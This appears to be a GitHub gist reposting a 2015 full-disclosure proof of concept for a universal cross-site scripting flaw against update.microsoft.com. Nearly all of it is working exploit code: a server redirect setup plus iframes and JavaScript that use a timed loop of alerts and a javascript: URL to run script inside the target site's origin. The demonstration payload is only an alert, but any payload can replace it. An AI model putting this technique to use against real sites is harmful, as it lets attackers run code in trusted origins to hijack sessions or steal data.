/gist:f0b1481f0ae5424454f3 Secret
Created Feb 3, 2015

// From http://seclists.org/fulldisclosure/2015/Feb/0
// Sample: UXSS against https://update.microsoft.com
// Make the URI /1 on your server respond with the HTTP redirect:
< HTTP/1.1 302 Found
< Content-Type: text/html;charset=utf-8
< Location: https://update.microsoft.com/asdadasd
// XSS into https://update.microsoft.com
<iframe id=i name=i src="/1"></iframe><br>
<iframe src="https://update.microsoft.com/asdadasd" onload='sploit()'></iframe><br>
<script>
function sploit(){
var payload = 'alert(location.href);'
frames[0].setTimeout("alert(eval('x=top.frames[1];d=new Date;while((new Date)-d<3000)alert(\\'An error occurred.\\');x.location=\\'javascript:%22%3Cscript%3E"+encodeURIComponent(payload)+"%3C/script%3E%22\\';'))",1);
}
</script>